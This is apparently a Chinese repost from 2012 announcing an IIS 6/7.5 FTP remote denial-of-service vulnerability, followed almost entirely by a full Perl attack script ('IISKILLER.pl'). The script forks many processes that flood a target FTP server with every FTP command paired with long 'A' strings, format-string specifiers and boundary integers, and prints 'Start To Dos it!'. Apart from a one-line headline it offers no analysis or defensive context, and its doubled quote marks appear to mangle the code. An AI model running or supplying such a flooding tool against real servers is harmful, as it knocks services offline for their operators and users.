IIS 6/7.5 FTP 远程拒绝服务漏洞 poco

2012-7-11 15:59:35 来源:网络转载 浏览:343
iis最新漏洞公布:IIS 6/7.5 FTP 远程拒绝服务漏洞 poco。
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
   print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
 exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
 print "$host -> $port is alive.\n";
 $check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@all=(
''A''x5,''A''x17,''A''x33,''A''x65,''A''x76,''A''x129,''A''x257,''A''x513,''A''x1024,''A''x2049,''A''x4097,''A''x8193,''A''x12288,
''%s%p%x%d'',''024d'',''%.2049d'',''%p%p%p%p'',''%x%x%x%x'',''%d%d%d%d'',''%s%s%s%s'',''%99999999999s'',''%08x'',''%%20d'',''%%20n'',''%%20x'',''%%20s'',
''%s%s%s%s%s%s%s%s%s%s'',''%p%p%p%p%p%p%p%p%p%p'',''%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%'',
''%s''x129,''%x''x257,''-1'',''0'',''0x100'',''0x1000'',''0x3fffffff'',''0x7ffffffe'',''0x7fffffff'',''0x80000000'',''0xfffffffe'',''0xffffffff'',''0x10000'',
''0x100000'',''1'',
''A''x5,''A''x17,''A''x33,''A''x65,''A''x76,''A''x129,''A''x257,''A''x513,''A''x1024,''A''x2049,''A''x4097,''A''x8193,''A''x12288,
''%s%p%x%d'',''024d'',''%.2049d'',''%p%p%p%p'',''%x%x%x%x'',''%d%d%d%d'',''%s%s%s%s'',''%99999999999s'',''%08x'',''%%20d'',''%%20n'',''%%20x'',''%%20s'',
''%s%s%s%s%s%s%s%s%s%s'',''%p%p%p%p%p%p%p%p%p%p'',''%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%'',
''%s''x129,''%x''x257,''-1'',''0'',''0x100'',''0x1000'',''0x3fffffff'',''0x7ffffffe'',''0x7fffffff'',''0x80000000'',''0xfffffffe'',''0xffffffff'',''0x10000'',
''0x100000'',''1'',
);
sub check(){
 #Thread->self->detach;
 $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
 if(defined $sock){
  #print "$host -> $port is alive.\n";
  undef($content_tmp);
  $sock->recv($content_tmp,100,0);
  if(length($content_tmp)>0){
   $sock->close;
   return 1;
  }else{
   $sock->close;
   return 0;
  }
 }else{
  #print("$host -> $port is closed!\n");
  return 0;
 }
}
@command=(
''NLST'',''CWD'',''STOR'',''RETR'',''MKD'',''RMD'',''DELE'',''RNFR'',''RNTO'',''LIST'',     
''MDTM'',''SIZE'',''STAT'',''ACCT'',''HELP'',''MODE'',''APPE'',''STRU'',''SITE'',
''SITE INDEX'',''TYPE'',''TYPE A'', ''TYPE E'', ''TYPE L'', ''TYPE I'',
''NLST'',''CWD'',''STOR'',''RETR'',''MKD'',''RMD'',''DELE'',''RNFR'',''RNTO'',''LIST'',     
''MDTM'',''SIZE'',''STAT'',''ACCT'',''HELP'',''MODE'',''APPE'',''STRU'',''SITE'',
''SITE INDEX'',''TYPE'',''TYPE A'', ''TYPE E'', ''TYPE L'', ''TYPE I'',
''NLST'',''CWD'',''STOR'',''RETR'',''MKD'',''RMD'',''DELE'',''RNFR'',''RNTO'',''LIST'',     
''MDTM'',''SIZE'',''STAT'',''ACCT'',''HELP'',''MODE'',''APPE'',''STRU'',''SITE'',
''SITE INDEX'',''TYPE'',''TYPE A'', ''TYPE E'', ''TYPE L'', ''TYPE I'',            
);
print "Start To Dos it!\n";
#enumerate command
$pm = new Parallel::ForkManager(10);
for($i = 1; $i < 9000; $i++) {
my $pid = $pm->start and next;
   COMMANDS: foreach $cmd (@command){
 foreach $poc (@all){
  LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>''tcp'', Timeout=>30);
  if(defined($sock4)){
   $sock4->send("$cmd"." "."$poc\r\n", 0);
   $sock4->recv($content, 0, 900);
    }
   }
  } 
$pm->finish;
}
(0)
(0)